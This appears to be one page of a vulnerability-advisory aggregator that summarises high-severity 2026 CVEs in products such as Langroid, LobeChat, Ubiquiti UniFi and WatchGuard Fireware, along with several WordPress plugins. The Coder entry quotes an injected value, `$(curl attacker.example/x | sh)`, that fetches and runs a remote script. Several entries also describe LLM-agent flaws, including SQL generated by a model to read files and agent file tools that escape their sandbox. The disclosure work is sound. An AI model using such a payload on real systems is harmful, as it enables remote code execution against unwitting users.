Skip to main content
CVE-2026-50180 HIGH POC PATCH GHSA This Week

Arbitrary file read in Langroid's SQLChatAgent (<= 0.63.0) lets an attacker who can influence the LLM-generated SQL exfiltrate files from the PostgreSQL host even under the strict default config (allow_dangerous_operations=False, allowed_statement_types=['SELECT']). The _validate_query blocklist enumerates dangerous functions by exact name and misses the pg_read_file/pg_stat_file/pg_ls_*/pg_current_logfile family (plus MSSQL OPENDATASOURCE and keyword-less SQLite ATTACH), so these SELECT-shaped payloads pass both the statement-type allowlist and the regex blocklist and reach the live SQLAlchemy engine. Publicly available exploit code exists (a working PoC ships in the GHSA advisory); no public exploit identified as actively exploited and this is not in CISA KEV.

PostgreSQL Python Path Traversal Canonical Docker
NVD GitHub
CVSS 4.0
8.7
EPSS
0.7%
CVE-2026-59094 HIGH POC PATCH This Week

Denial of service in Pathway data-processing framework (versions through 0.31.1) lets a remote unauthenticated attacker exhaust CPU by submitting a short glob pattern packed with many ** tokens to the document store's /v1/retrieve, /v1/inputs and /v2/answer endpoints. The hand-written recursive matcher branches exponentially on each ** without memoization, so a handful of crafted requests can stall the service for tens of seconds each and deny availability. Publicly available exploit code exists and a vendor patch (commit d09722e) is available; the flaw is not listed in CISA KEV.

Information Disclosure Pathway
NVD GitHub
CVSS 4.0
8.7
EPSS
0.5%
CVE-2026-59095 HIGH POC PATCH This Week

Server-side request forgery in LobeChat before 2.2.10-canary.18 lets authenticated users coerce the server into issuing internal HTTP requests to attacker-chosen URLs, enabling disclosure of internal service responses and cloud credentials from instance metadata endpoints. The flaw stems from two endpoints - skill import (importFromUrl) and topic cover update (fetchImageFromUrl) - calling the global fetch instead of the project's ssrf-safe-fetch wrapper. Publicly available exploit code exists and a vendor patch has shipped, though it is not listed in CISA KEV.

SSRF Lobehub
NVD GitHub
CVSS 4.0
8.3
EPSS
0.2%
CVE-2026-58467 HIGH POC PATCH This Week

Arbitrary file disclosure and PHP local file inclusion in Cockpit CMS before release 364 lets unauthenticated remote attackers read files outside the web root and, on certain server setups, cause the application to include() attacker-chosen .php files. The flaw stems from unvalidated PATH_INFO (derived from REQUEST_URI) being used to build filesystem paths without containment checks. Publicly available exploit code exists; it is not listed in CISA KEV and no EPSS score was provided.

Path Traversal Nginx PHP Cockpit
NVD GitHub
CVSS 4.0
8.2
EPSS
0.4%
CVE-2026-58578 HIGH POC PATCH This Week

Denial of service in LobeChat before 2.2.10-canary.15 lets an authenticated user hang the entire Node.js server by importing a GitHub-hosted skill whose repository URL path contains a catastrophic-backtracking regex pattern. Because the malicious basePath is compiled into a dynamic regular expression in findSkillMd and matched synchronously against archive entries, a single request blocks the shared event loop for tens of seconds, denying service to all concurrent users. Publicly available exploit code exists and a vendor patch is available, though there is no public exploit identified as being used in active exploitation.

Node.js Denial Of Service Lobehub
NVD GitHub
CVSS 4.0
7.1
EPSS
0.3%
CVE-2026-59098 HIGH POC PATCH This Week

Cross-user data disclosure in LobeChat through version 2.2.9 allows any authenticated user to read other users' documents by abusing the retrieval-augmented-generation (RAG) semantic search, whose chunk model omits a user-identifier predicate. By supplying arbitrary victim file or knowledge-base identifiers through the chunk retrieval and chat knowledge-base paths, an attacker recovers text content, file names, and metadata belonging to other tenants. Publicly available exploit code exists and a vendor patch has been released; the flaw is not listed in CISA KEV and no active exploitation is reported.

Authentication Bypass Lobehub
NVD GitHub VulDB
CVSS 4.0
7.1
EPSS
0.2%
CVE-2026-50181 HIGH POC PATCH GHSA This Week

Path traversal in Langroid's ReadFileTool and WriteFileTool lets a tool caller escape the configured curr_dir workspace boundary by supplying '../' sequences in file_path, because the tools only chdir into curr_dir without resolving and enforcing that the final path stays inside it. Applications that expose these file tools to an LLM agent or user-influenced tool calls can have arbitrary files read or written outside the intended project/sandbox directory, exposing secrets, config, and source files or corrupting files elsewhere on the host. Publicly available exploit code exists (a working PoC is included in the report demonstrating both read and write escapes), but there is no public exploit identified as being used in active attacks and it is not listed in CISA KEV.

Python Path Traversal Docker
NVD GitHub
CVSS 3.1
7.1
EPSS
0.2%
CVE-2026-58460 HIGH POC This Week

Arbitrary file overwrite in the react-native-receive-sharing-intent library (ajith-ab) lets a co-resident malicious Android app write attacker-controlled content outside the intended cache directory into the consuming app's private data. The flaw stems from trusting a ContentProvider-supplied _display_name containing dot-dot sequences, enabling overwrite of databases, shared preferences, and cached config. Publicly available exploit code exists (reported by VulnCheck); no active exploitation has been reported in CISA KEV.

Path Traversal React Native Receive Sharing Intent
NVD GitHub VulDB
CVSS 4.0
7.0
EPSS
0.1%
CVE-2026-54998 HIGH PATCH NEWS NO ACTION HOSTED Monitor

Privilege escalation in Microsoft Exchange Online allows an already-authenticated attacker to elevate their permissions over the network by exploiting an incorrect authorization check (CWE-863). Because Exchange Online is a cloud-hosted, multi-tenant service, a low-privileged authenticated user could gain elevated access to confidential data, tamper with mail/configuration, and disrupt availability. No public exploit has been identified at time of analysis, and the EPSS/exploit-maturity signal (E:U) indicates exploit code is currently unproven.

Authentication Bypass Microsoft Microsoft Exchange Online
NVD VulDB
CVSS 3.1
8.8
EPSS
0.6%
CVE-2026-57100 HIGH PATCH NEWS NO ACTION HOSTED Monitor

Privilege escalation via server-side request forgery affects the Microsoft Entra Provisioning Service (SyncFabric), where an authenticated attacker with low privileges can coerce the service into making attacker-controlled network requests to reach internal endpoints and elevate privileges across the identity provisioning fabric. Microsoft has released a fix through MSRC; there is no public exploit identified at time of analysis, and SSVC rates exploitation as none with an EPSS of 0.64%. The high CVSS of 8.8 is driven by total technical impact (C:H/I:H/A:H) against a cloud identity control plane.

SSRF Microsoft Microsoft Entra Provisioning Service
NVD VulDB
CVSS 3.1
8.8
EPSS
0.6%
CVE-2026-45499 HIGH PATCH NEWS NO ACTION HOSTED Monitor

Privilege elevation in Microsoft's Azure OpenAI service allows an authorized (low-privileged) attacker to abuse a server-side request forgery flaw (CWE-918) to force the service backend to issue attacker-controlled network requests, resulting in high confidentiality, integrity, and availability impact. The flaw carries CVSS 8.8 and requires only low privileges over the network with no user interaction, but currently shows no public exploit identified at time of analysis and a modest EPSS of 0.62%. Because Azure OpenAI is a Microsoft-hosted cloud service, remediation is delivered server-side by the vendor rather than requiring customer patching.

SSRF Microsoft Azure Open Ai
NVD VulDB
CVSS 3.1
8.8
EPSS
0.6%
CVE-2026-44454 HIGH PATCH GHSA This Week

Command injection leading to arbitrary code execution affects Coder's self-hosted developer workspace platform via the coder/registry `dotfiles` module, which interpolated the user-controlled `dotfiles_uri` into a shell script without validation. Combined with the Create Workspace page's `mode=auto` deep links, an attacker can craft a single URL that silently provisions a workspace with an attacker-supplied `dotfiles_uri` (e.g. `foo$(curl attacker.example/x | sh).com`), turning it into a one-click RCE against any authenticated user who clicks. CVSS is 8.8 (High) with EPSS at 2.28% (81st percentile); there is no public exploit identified and it is not in CISA KEV, though a proof-of-concept URL is documented in the advisory.

Command Injection RCE
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
2.3%
CVE-2026-54402 HIGH PATCH This Week

Command injection in Ubiquiti UniFi OS (all builds before 5.1.19) lets a low-privileged user on the same network run arbitrary operating-system commands on the underlying host device, giving full control of gateways, recorders, and Cloud Keys. The flaw stems from improper input validation (CWE-20) and carries high confidentiality, integrity, and availability impact (CVSS 8.8). There is no public exploit identified at time of analysis, and CISA's SSVC framework rates exploitation as none, but the technical impact is total and a vendor patch is already available.

Command Injection Ubiquiti Unifi Os Server Dream Machines Enterprise Fortress Gateway +9
NVD VulDB
CVSS 3.1
8.8
EPSS
0.8%
CVE-2026-44941 HIGH PATCH This Week

Arbitrary root file write in libzypp before 17.38.12 lets an attacker who can get a victim to add or refresh a malicious software repository overwrite or inject files anywhere on the system as root, because the "keyhint" value in repomd.xml is parsed without rejecting path separators (CWE-23 relative path traversal). Because libzypp performs repository operations with root privileges on SUSE/openSUSE systems, this escalates directly to full host compromise. Publicly available exploit code exists (SSVC=poc); it is not listed in CISA KEV, and EPSS is low (0.49%, 38th percentile), consistent with a targeted rather than mass-exploited flaw.

Path Traversal Libzypp
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.5%
CVE-2026-56841 HIGH PATCH This Week

Privilege escalation in Ubiquiti's UniFi Protect Application is possible through an authenticated SQL injection (CWE-89) reachable by a low-privileged user with network access, letting that attacker escalate privileges on the underlying host device with full confidentiality, integrity, and availability impact. The flaw was reported through HackerOne and disclosed in Ubiquiti Security Advisory Bulletin 066; there is no public exploit identified at time of analysis and it is not listed in CISA KEV. With CVSS 8.8 (AV:N/AC:L/PR:L) it is a high-priority patch for any exposed NVR/Protect deployment.

Ubiquiti SQLi Unifi Protect Application
NVD
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-54404 HIGH PATCH This Week

Privilege escalation in Ubiquiti UniFi OS allows a low-privileged, network-adjacent user to chain a series of authenticated SQL injection flaws (CWE-89) to gain elevated privileges on affected UniFi OS instances and hardware. The issue affects UniFi OS Server and a broad range of Ubiquiti gateway, recorder, and Cloud Key appliances. There is no public exploit identified at time of analysis, and the flaw is not listed in CISA KEV, but the CVSS 8.8 rating and low attack complexity make it a meaningful escalation risk once an attacker has any authenticated foothold.

Ubiquiti SQLi Unifi Os Server Dream Machines Enterprise Fortress Gateway +9
NVD VulDB
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-55114 HIGH PATCH This Week

Privilege escalation in Ubiquiti's UniFi Network Application allows a low-privileged, network-adjacent user to gain elevated privileges within the controller due to Improper Access Control (CWE-284). Tagged as an authentication/authorization bypass and reported via HackerOne, the flaw carries a CVSS 8.8 with full confidentiality, integrity, and availability impact once triggered. No public exploit has been identified at time of analysis, and it is not listed in CISA KEV.

Authentication Bypass Ubiquiti Unifi Network Application
NVD
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-13125 HIGH This Week

Missing authentication in GeoVision's GeoWebPlayer addon (also branded 'Web Plugin' in GV-VMS and 'WS Player' in VMS-Cloud) lets any web page reach a locally-bound, unauthenticated WebSocket server and invoke sensitive APIs. By chaining the `create` method with `getScreenCapture`, a remote attacker who lures a victim to a malicious site can silently exfiltrate the contents of the user's screen. No public exploit identified at time of analysis, and the flaw is not on the CISA KEV list; CVSS is 8.8 driven by network reach and a scope change into the browsing user's data.

Authentication Bypass Geowebplayer
NVD
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-54401 HIGH PATCH This Week

Privilege escalation via Server-Side Request Forgery affects Ubiquiti UniFi OS devices and the UniFi OS Server across the Dream Machine, Dream Router, Cloud Gateway, Cloud Key, Enterprise Fortress/Firewall, and NVR/EVR product lines running versions below 5.1.19. A low-privileged user with network access can coerce the device into making attacker-controlled internal requests, leveraging the SSRF to reach privileged internal services and elevate to higher privileges within the appliance. No public exploit identified at time of analysis, EPSS risk is low (0.20%, 10th percentile), and the flaw is not listed in CISA KEV, but a vendor patch is available.

SSRF Ubiquiti Unifi Os Server Dream Machines Enterprise Fortress Gateway +9
NVD VulDB
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-55112 HIGH PATCH This Week

Privilege escalation in UniFi OS running the UniFi Protect Application (versions below 5.1.19) allows a network-adjacent, low-privileged attacker to gain control of the underlying host device via improper access control. Affected hardware spans Ubiquiti's Dream Machines, Dream Wall, Dream Routers, Cloud Keys, Cloud Gateways, and Network/Enterprise Video Recorders. No public exploit identified at time of analysis; EPSS is low (0.19%) and CISA SSVC records no known exploitation, but the total technical impact and 8.8 CVSS make it a meaningful patch priority.

Authentication Bypass Ubiquiti Dream Machines Dream Wall Dream Routers +4
NVD VulDB
CVSS 3.1
8.8
EPSS
0.2%
CVE-2024-58352 HIGH This Week

Landray OA contains an unauthenticated HQL injection vulnerability that allows unauthenticated attackers to query arbitrary Hibernate entity classes by injecting malicious HQL syntax into the uid. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

RCE Information Disclosure
NVD
CVSS 4.0
8.7
EPSS
0.6%
CVE-2026-58465 HIGH PATCH This Week

Memory-exhaustion denial of service in Eclipse Wakaama (an OMA LwM2M client/server library) before snapshot 2026-05-26 allows unauthenticated remote attackers to crash the server by streaming CoAP Block1 PUT requests. The CoAP Block1 handler in coap/block.c appends each incoming block to a reassembly buffer without capping total size, so an attacker reaching the UDP registration endpoint can force unbounded reallocation until memory is exhausted. Reported by VulnCheck with a vendor patch available; no public exploit identified at time of analysis and the CVE is not listed in CISA KEV.

Denial Of Service Wakaama
NVD GitHub
CVSS 4.0
8.7
EPSS
0.6%
CVE-2026-49255 HIGH PATCH GHSA This Week

Arbitrary command execution in electerm (the open-source cross-platform SSH/SFTP/terminal client) allows a malicious remote server to run OS commands on the connecting user's desktop. The flaw lives in the rmrf(), mv() and cp() helpers in src/app/lib/fs.js, which build shell command strings by interpolating attacker-influenced file paths without escaping shell metacharacters; a hostile SSH/SFTP server that serves files with crafted names can break out of the quoted argument when the victim performs a file operation. Rated CVSS 8.8; no public exploit identified at time of analysis and it is not listed in CISA KEV, so treat this as high-severity but not confirmed exploited.

Command Injection Microsoft
NVD GitHub
CVSS 3.1
8.8
CVE-2026-56037 HIGH This Week

PHP Object Injection in the Themify Popup WordPress plugin (all versions through 1.4.3) lets an authenticated attacker pass attacker-controlled serialized data into an unsafe deserialization sink (CWE-502), instantiating arbitrary PHP objects. Combined with a suitable gadget chain in the plugin, WordPress core, or other installed code, this can escalate to remote code execution, data theft, or site takeover. Reported by Patchstack; no public exploit is identified at time of analysis and it is not on CISA KEV.

Deserialization
NVD
CVSS 3.1
8.8
EPSS
0.3%
CVE-2026-57766 HIGH This Week

Cross-Site Request Forgery in the WPIDE - File Manager & Code Editor WordPress plugin (versions <= 3.5.6) allows a remote attacker to forge privileged requests that a logged-in administrator's browser executes without consent. Because WPIDE exposes filesystem read/write and code-editing functionality, a successful CSRF can lead to arbitrary file modification and effectively remote code execution on the WordPress host. No public exploit identified at time of analysis, and it is not listed in CISA KEV; EPSS was not provided.

CSRF Wpide File Manager Code Editor
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-57759 HIGH This Week

Cross-site request forgery in the ProfileGrid - User Profiles, Groups and Communities WordPress plugin (versions 5.9.9.7 and earlier) allows a remote unauthenticated attacker to force a logged-in victim into performing unintended state-changing actions, chaining to full account takeover. Because a successful CSRF against an administrator can hijack a privileged account, impact is rated high across confidentiality, integrity, and availability (CVSS 8.8). No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

CSRF Profilegrid
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-27414 HIGH This Week

PHP Object Injection in the Werkstatt WordPress theme (fuelthemes) through version 4.8.3 lets a Contributor-level user pass attacker-controlled data into an unsafe deserialization routine, enabling instantiation of arbitrary PHP objects. With the right POP gadget chain present in WordPress core, another plugin, or the theme itself, this can escalate to file operations, SQL manipulation, or remote code execution. No public exploit identified at time of analysis, and it is not listed in CISA KEV; the 8.8 CVSS reflects the low-privilege network-exploitable path with high confidentiality, integrity, and availability impact.

Deserialization PHP Werkstatt
NVD
CVSS 3.1
8.8
EPSS
0.3%
CVE-2026-27060 HIGH This Week

Authenticated PHP object injection in the ARMember Premium WordPress membership plugin (all versions through 7.0) lets low-privileged Contributor-level users pass attacker-controlled serialized data into a PHP unserialize() sink, potentially chaining with POP gadgets to achieve high-impact compromise. With a CVSS of 8.8 and network vector, a user holding only a Contributor account can reach confidentiality, integrity, and availability impacts. No public exploit has been identified at time of analysis and it is not on CISA KEV, but the vulnerability class is well understood and reliably weaponizable where a suitable gadget chain exists.

Deserialization PHP Armember Premium
NVD
CVSS 3.1
8.8
EPSS
0.3%
CVE-2026-13084 HIGH This Week

Denial-of-service in WatchGuard Fireware OS lets a remote, unauthenticated attacker crash the IKEv2 VPN service by sending specially crafted IKEv2 messages that trigger a null pointer dereference (CWE-476). The flaw affects appliances running Mobile User VPN with IKEv2 or Branch Office VPN over IKEv2 with a dynamic gateway peer, spanning Fireware OS 11.10.2 through 2026.2. No public exploit identified at time of analysis; the CVSS 4.0 score of 8.7 reflects high availability impact with no confidentiality or integrity loss.

Watchguard Denial Of Service Microsoft Null Pointer Dereference Fireware Os
NVD VulDB
CVSS 4.0
8.7
EPSS
0.5%
CVE-2026-55950 HIGH PATCH This Week

Remote denial of service in Erlang/OTP's ssl application (dtls_packet_demux module) lets an unauthenticated attacker crash every active DTLS session on a listener by rapidly reconnecting from the same source IP and port. Because a single shared demux gen_server routes all UDP datagrams for a listener, its TOCTOU-induced crash takes down all clients, not just the attacker's, and can be repeated for a persistent outage. No public exploit is identified at time of analysis, and the issue is not listed in CISA KEV.

Denial Of Service Otp
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.4%
CVE-2026-54406 HIGH PATCH This Week

Privilege escalation via path traversal in self-hosted UniFi Network Application (Ubiquiti's controller software) allows an authenticated, high-privileged attacker with network access to write files outside intended directories and escalate write permissions on the underlying host. The CVSS 3.1 base score is 8.7 with a scope change, reflecting that the flaw lets the application's write capability break out to affect the host system beyond the application's security boundary. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; it was reported through HackerOne and addressed in Ubiquiti Security Advisory Bulletin 066.

Ubiquiti Path Traversal Unifi Network Application
NVD
CVSS 3.1
8.7
EPSS
0.3%
CVE-2026-55794 HIGH POC PATCH GHSA This Week

Authenticated remote code execution in Craft CMS 5.9.0 through 5.9.x allows control panel users with entry-editing permissions to inject unsandboxed Twig code via the HTTP Referer header during entry save operations. Because the signed redirect URL derived from the attacker-controlled Referer is compiled with renderObjectTemplate() instead of the sandboxed renderSandboxedObjectTemplate(), a low-privileged CMS operator can achieve server-side template injection leading to code execution. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the flaw is fixed in Craft CMS 5.10.0.

Code Injection RCE
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.3%
CVE-2026-59093 HIGH PATCH This Week

Privilege escalation in Weaviate vector database versions before 1.38.0 allows a user holding only the delegated assign_and_revoke_users or assign_and_revoke_groups permission to grant the built-in admin role (or any high-privilege custom role) to itself or others, obtaining full administrative control of the database. The flaw stems from the role-assignment handlers checking only that the caller may assign roles to a target, but never verifying the caller actually holds the permissions being conferred - unlike role creation, which enforces permission subset checks. Reported by VulnCheck with a vendor patch in v1.38.0; no public exploit identified at time of analysis.

Privilege Escalation Weaviate
NVD GitHub
CVSS 4.0
8.7
EPSS
0.3%
CVE-2026-9272 HIGH This Week

SQL injection in Progress Flowmon ADS (Anomaly Detection System) before versions 12.5.6 and 13.0.5 allows a low-privileged authenticated user to read and modify application data by sending specially crafted requests. The CVSS 4.0 base score of 8.7 (High) reflects high confidentiality and integrity impact plus availability impact over the network with only low privileges required. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV.

Authentication Bypass SQLi Flowmon Ads
NVD VulDB
CVSS 4.0
8.7
EPSS
0.2%
CVE-2026-8079 HIGH This Week

Privilege escalation via incorrect authorization in Progress Flowmon lets an authenticated low-privileged user abuse the PDF generation workflow to have operations executed under another user's identity, exposing sensitive data and permitting unauthorized configuration changes. It affects all Flowmon releases before 12.5.9 (12.x branch) and before 13.0.10 (13.x branch). No public exploit identified at time of analysis, and it is not listed in CISA KEV; the vendor CVSS 4.0 score is 8.7 (High).

Authentication Bypass Information Disclosure Flowmon
NVD VulDB
CVSS 4.0
8.7
EPSS
0.2%
CVE-2026-49283 HIGH PATCH GHSA This Week

Authentication bypass and IdP impersonation in the SimpleSAMLphp saml2 library (and the saml2-legacy package) lets a malicious or lower-trust identity provider in a shared federation forge assertions for higher-trust IdPs when the HTTP-Artifact binding is used. Because the TLS-based validator applied to the SOAP ArtifactResponse returns normally instead of throwing when its public key does not match the embedded Response, an unsigned embedded SAML Response claiming a different issuer is accepted as valid, allowing an attacker to log into the SP as arbitrary users of a victim IdP. CVSS is 8.7; there is no public exploit identified at time of analysis and no CISA KEV listing.

Authentication Bypass
NVD GitHub
CVSS 3.1
8.7
CVE-2026-54403 HIGH PATCH This Week

Authentication bypass in Ubiquiti UniFi OS devices allows a network-adjacent attacker to abuse a path traversal flaw (CWE-22) to reach protected functionality without valid credentials, affecting a broad hardware line including Dream Machines/Routers/Wall, Cloud Gateways/Keys, Express 7, Enterprise Fortress Gateway, and the UniFi OS Server software. The CVSS 8.6 rating is driven by an unauthenticated, low-complexity network vector combined with a scope change (S:C), meaning the compromised authentication boundary exposes managed device data. No public exploit identified at time of analysis and it is not listed in CISA KEV, but the ubiquity of affected consoles makes this a high-priority patch.

Ubiquiti Path Traversal Unifi Os Server Dream Machines Enterprise Fortress Gateway +9
NVD
CVSS 3.1
8.6
EPSS
0.5%
CVE-2026-13050 HIGH This Week

Remote code execution in WatchGuard Fireware OS (the operating system powering Firebox network security appliances) allows an authenticated privileged administrator to run arbitrary code on the firewall by sending specially crafted requests to the Management Web UI, which trigger an out-of-bounds write in the networkd process. The flaw spans a wide version range (11.8 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2026.2) and carries a CVSS 4.0 base score of 8.6 (High). It was reported by WatchGuard's own PSIRT; there is no public exploit identified at time of analysis and it is not listed in CISA KEV.

Memory Corruption Watchguard Buffer Overflow RCE Fireware Os
NVD VulDB
CVSS 4.0
8.6
EPSS
0.4%
CVE-2026-13384 HIGH This Week

Authenticated arbitrary code execution in WatchGuard Fireware OS (12.1-12.12 and 2025.1-2026.2) arises from an out-of-bounds write in the wgagent process, reachable when a privileged user sends specially crafted requests to the Management Web UI. A high-privilege attacker (or one who has compromised admin credentials) can corrupt memory to run code on the firewall appliance, undermining the security gateway itself. No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV.

Memory Corruption Watchguard Buffer Overflow RCE Fireware Os
NVD VulDB
CVSS 4.0
8.6
EPSS
0.4%
CVE-2026-13383 HIGH This Week

Arbitrary code execution in WatchGuard Fireware OS (the firmware powering Firebox network security appliances) arises from an out-of-bounds write in the ikestubd process, reachable through the Management Web UI. An authenticated user holding privileged (administrative) access can send specially crafted requests to corrupt memory and execute code on the appliance. No public exploit identified at time of analysis and the issue is not listed in CISA KEV; risk is bounded by the requirement for existing privileged access.

Memory Corruption Watchguard Buffer Overflow RCE Fireware Os
NVD VulDB
CVSS 4.0
8.6
EPSS
0.4%
CVE-2026-13053 HIGH This Week

Authenticated command execution in WatchGuard Fireware OS lets a privileged administrator escalate a specially crafted CLI command into arbitrary code execution via an out-of-bounds write (CWE-787). The flaw affects a very broad version span (Fireware OS 11.0 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2026.2), placing most currently and historically deployed WatchGuard Firebox appliances in scope. No public exploit identified at time of analysis and the issue is not listed in CISA KEV; the CVSS 4.0 score of 8.6 reflects full confidentiality/integrity/availability impact once the required privileged access is obtained.

Memory Corruption Watchguard Buffer Overflow RCE Fireware Os
NVD VulDB
CVSS 4.0
8.6
EPSS
0.4%
CVE-2026-13054 HIGH This Week

Arbitrary file write in the WatchGuard Fireware OS Management Web UI lets a privileged, authenticated administrator escape the intended directory and write files anywhere on a Firebox appliance's filesystem, per CVSS 4.0 (AV:N/PR:H). This affects Fireware OS across the 11.x, 12.x, and 2025.1-2026.2 branches and can be leveraged to tamper with configuration or system binaries, potentially leading to code execution or device compromise. There is no public exploit identified at time of analysis and it is not listed in CISA KEV.

Path Traversal Watchguard Fireware Os
NVD VulDB
CVSS 4.0
8.6
EPSS
0.4%
CVE-2026-55117 HIGH PATCH This Week

Arbitrary file disclosure in Ubiquiti's UniFi Access Application allows a network-adjacent, unauthenticated attacker to read files on the underlying host via path traversal (CWE-22), carrying a CVSS 8.6 rating driven by a scope change and high confidentiality impact. The flaw was reported through HackerOne and addressed in Ubiquiti Security Advisory Bulletin 066. There is no public exploit identified at time of analysis and it is not listed in CISA KEV.

Ubiquiti Path Traversal Unifi Access Application
NVD
CVSS 3.1
8.6
EPSS
0.3%
CVE-2026-54407 HIGH PATCH This Week

Authentication bypass in Ubiquiti UniFi Protect Application lets a network-adjacent attacker reach certain API endpoints without valid credentials due to improper access control (CWE-284). Rated CVSS 8.6, the flaw combines low confidentiality and integrity impact with high availability impact, meaning an unauthenticated actor on the network could interact with protected surveillance-management functions. No public exploit identified at time of analysis, and it is not listed in CISA KEV, but the network vector with no privileges required (AV:N/PR:N) makes it a meaningful exposure for internet- or LAN-reachable deployments.

Authentication Bypass Ubiquiti Unifi Protect Application
NVD
CVSS 3.1
8.6
EPSS
0.3%
CVE-2026-13722 HIGH This Week

Firmware signature validation bypass in WatchGuard Fireware OS lets an authenticated administrator upload a tampered firmware image through the backup/restore feature and have it installed despite failing integrity checks. Affecting Fireware OS branches 11.0 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2025.6.2, the flaw (CWE-347) enables persistent malicious code on the appliance. No public exploit identified at time of analysis and it is not listed in CISA KEV, but the high integrity/confidentiality/availability impact and the appliance's privileged network position make it significant.

Authentication Bypass Jwt Attack Watchguard Fireware Os
NVD VulDB
CVSS 4.0
8.6
EPSS
0.2%
CVE-2026-52854 HIGH POC PATCH GHSA This Week

{{#display_map}} parser function when the leaflet service is used. Overlay names are passed unescaped into Leaflet, which renders them as raw HTML, so a crafted overlay value executes in the browser of every user who views the page. A working proof-of-concept is published in the advisory, though there is no public exploit identified beyond it and no evidence of active exploitation.

XSS
NVD GitHub
CVSS 3.1
8.6
CVE-2026-57765 HIGH This Week

SQL injection in the WP EasyCart WordPress e-commerce plugin (all versions up to and including 5.9.0) lets a low-privileged authenticated user with Contributor role inject arbitrary SQL into backend queries. Reported by Patchstack and rated CVSS 8.5, the flaw allows attackers to read sensitive database contents such as customer records, order data, and WordPress user credential hashes. No public exploit identified at time of analysis, and it is not listed in CISA KEV.

SQLi Wp Easycart
NVD
CVSS 3.1
8.5
EPSS
0.2%
CVE-2026-57756 HIGH This Week

Authenticated SQL injection in the WordPress plugin nicen-localize-image (versions 1.4.9 and earlier) allows users holding the low-privilege Contributor role to inject arbitrary SQL into the WordPress database backend. Because the CVSS scope is changed and confidentiality impact is High, a Contributor can read data beyond the plugin's own remit, potentially extracting other users' credentials or secrets from the wp_users/wp_options tables. Reported by Patchstack with a CVSS of 8.5; no public exploit identified at time of analysis and the CVE is not listed in CISA KEV.

SQLi Nicen Localize Image
NVD
CVSS 3.1
8.5
EPSS
0.2%
CVE-2026-57752 HIGH This Week

SQL injection in the iNET Webkit WordPress plugin (version 1.2.4 and prior) lets authenticated users holding at least the Contributor role inject arbitrary SQL through unsanitized input, exposing the WordPress database. Reported by Patchstack and carrying a CVSS 8.5 (scope-changed) rating, it enables read access to sensitive data such as user credentials and secrets. No public exploit identified at time of analysis, and it is not listed in CISA KEV.

SQLi Apple Inet Webkit
NVD
CVSS 3.1
8.5
EPSS
0.3%
CVE-2026-57687 HIGH This Week

SQL injection in the Custom Field Template WordPress plugin (versions <= 2.7.8) allows a low-privileged authenticated user at the Contributor role to inject arbitrary SQL into backend database queries. Because the CVSS scope is changed and confidentiality impact is High, a Contributor can read data beyond their own authorization boundary, including other users' credentials and site secrets. This is a Patchstack-reported issue with no public exploit identified at time of analysis and no KEV listing.

SQLi Custom Field Template
NVD
CVSS 3.1
8.5
EPSS
0.2%
Page 1 of 4 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy